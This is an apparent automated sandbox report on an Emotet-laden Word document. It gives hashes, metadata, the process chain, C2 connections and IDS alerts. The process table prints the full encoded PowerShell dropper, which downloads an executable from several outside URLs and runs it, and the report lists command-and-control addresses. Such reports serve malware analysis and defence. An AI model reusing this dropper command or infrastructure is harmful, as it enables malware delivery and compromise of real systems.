File name: | emo.doc |
Full analysis: | https://app.any.run/tasks/53156c4b-ccaa-4689-9a79-ee3152e55de6 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 16, 2019, 12:30:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 8AEE20CC6CD439B9883EF182711DAB21 |
SHA1: | B70D0E04B649BCC10EF71BAF1AB9B89EE6D4F449 |
SHA256: | 2371AE80A0950E3299F6CD079E2993E7504D9F2FA9BC459C87EE5452B21834F7 |
SSDEEP: | 3072:cq/2n5Ler/yR5DpQKajNDu1CkBArkxXfPgB:Be5LoKDpQZqQkCr4XgB |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
AppVersion: | 16 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 741 |
LinksUpToDate: | No |
Company: | - |
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 5 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 632 |
Words: | 110 |
Pages: | 1 |
TotalEditTime: | - |
Template: | Normal.dotm |
ModifyDate: | 2019:09:16 06:30:00Z |
CreateDate: | 2019:09:16 06:30:00Z |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Keywords: | - |
Description: | - |
---|---|
Creator: | - |
Subject: | - |
Title: | - |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 5547 |
ZipCompressedSize: | 583 |
ZipCRC: | 0x4fd1b7d1 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2860 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\emo.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3280 | powershell -enco JABIAFYAUwAwADgANAByAEEAPQAnAFkATQA4AGwASQBOACcAOwAkAFkAdAAzAE4AcQB1AGkAIAA9ACAAJwA3ADYAOAAnADsAJAB6AEgAbQBBAHEAaQB6AD0AJwBSAFIANgBUAEkAUgAnADsAJABGAFgAWQBPAFkATwBJAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZAHQAMwBOAHEAdQBpACsAJwAuAGUAeABlACcAOwAkAFAASQBiAGYAaQBYAEUASAA9ACcAYgBIAHQAQQA2AE8AQQAnADsAJABHAHAAUQB0AEwASABjAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAGUAVAAuAFcAZQBiAGMATABJAGUAbgB0ADsAJAB0ADQATgBqADIASgBIAEQAPQAnAGgAdAB0AHAAcwA6AC8ALwBhAHUAdABvAHIAZQBwAHUAZQBzAHQAbwBzAGQAbQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AQwBpAGwAbwBYAEkAcAB0AEkALwBAAGgAdAB0AHAAcwA6AC8ALwBwAGUAcAAtAGUAZwB5AHAAdAAuAGMAbwBtAC8AZQBlAGQAeQAvAHgAeAAzAHkAcwBwAGsAZQA3AF8AbAA3AGoAcAA1AC0ANAAzADAAMAA2ADcAMwA0ADgALwBAAGgAdAB0AHAAOgAvAC8AZABhAG4AYQBuAGcAbAB1AHgAdQByAHkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8ASwBUAGcAUQBzAGIAbAB1AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AZwBjAGUAcwBhAGIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGMAdQBzAHQAbwBtAGkAegBlAC8AegBVAGYASgBlAHIAdgB1AE0ALwBAAGgAdAB0AHAAcwA6AC8ALwBiAG8AbgBkAGEAZwBlAHQAcgBpAHAALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB5ADAAZwBtADMAeAB4AHMAXwBoAG0AbgB3ADgAcgBxAC0ANwA2ADQAMQA2ADEANgA5ADkALwAnAC4AIgBTAFAAYABMAEkAVAAiACgAJwBAACcAKQA7ACQAYgBWAG4AZgBIAHoAYwBwAD0AJwBJAEUAcQBOAEoANgAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBqADkAbwB3AGoAUABqACAAaQBuACAAJAB0ADQATgBqADIASgBIAEQAKQB7AHQAcgB5AHsAJABHAHAAUQB0AEwASABjAC4AIgBEAGAATwBgAFcATgBsAE8AQQBkAGYAYABJAGwARQAiACgAJABFAGoAOQBvAHcAagBQAGoALAAgACQARgBYAFkATwBZAE8ASQApADsAJAB6AGMAdgBpADQAcgA9ACcAegBmAFYAWABxAFQAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABGAFgAWQBPAFkATwBJACkALgAiAEwARQBuAGAARwBgAFQAaAAiACAALQBnAGUAIAAzADQAOAA5ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGAAQQBSAFQAIgAoACQARgBYAFkATwBZAE8ASQApADsAJABoAHEAbgBVAHIARgB0AEwAPQAnAFEAMgA1AGsARgBSAEsAQgAnADsAYgByAGUAYQBrADsAJAB3AGMANwBaAHoAMwA9ACcAYQBhADIAVQBPAFgAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQB1AFMAVwBCAFcAPQAnAG8AYgBEADcAUABGAGoAUwAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2676 | "C:\Users\admin\768.exe" | C:\Users\admin\768.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2168 | "C:\Users\admin\768.exe" | C:\Users\admin\768.exe | — | 768.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2384 | --2903b4b7 | C:\Users\admin\768.exe | — | 768.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3256 | --2903b4b7 | C:\Users\admin\768.exe | 768.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2404 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 768.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3376 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3504 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2128 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA54D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67805428.wmf | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72CF5476.wmf | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61228FF4.wmf | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5061E22.wmf | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\99678280.wmf | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84548C8E.wmf | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F7D37CC.wmf | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72708BBA.wmf | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\454C7BD8.wmf | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2128 | easywindow.exe | POST | 200 | 186.4.172.5:443 | http://186.4.172.5:443/acquire/jit/ | EC | binary | 705 Kb | malicious |
2128 | easywindow.exe | POST | 200 | 185.187.198.4:8080 | http://185.187.198.4:8080/badge/nsip/ | RU | binary | 132 b | malicious |
2128 | easywindow.exe | POST | 200 | 186.4.172.5:443 | http://186.4.172.5:443/child/stubs/ringin/merge/ | EC | binary | 148 b | malicious |
2128 | easywindow.exe | GET | 200 | 185.187.198.4:8080 | http://185.187.198.4:8080/whoami.php | RU | text | 13 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2128 | easywindow.exe | 186.4.172.5:443 | — | Telconet S.A | EC | malicious |
3280 | powershell.exe | 173.212.231.135:443 | autorepuestosdml.com | Contabo GmbH | DE | unknown |
2128 | easywindow.exe | 185.187.198.4:8080 | — | Pravoved LLC | RU | malicious |
Domain | IP | Reputation |
---|---|---|
autorepuestosdml.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
2128 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2128 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2128 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
2128 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2128 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |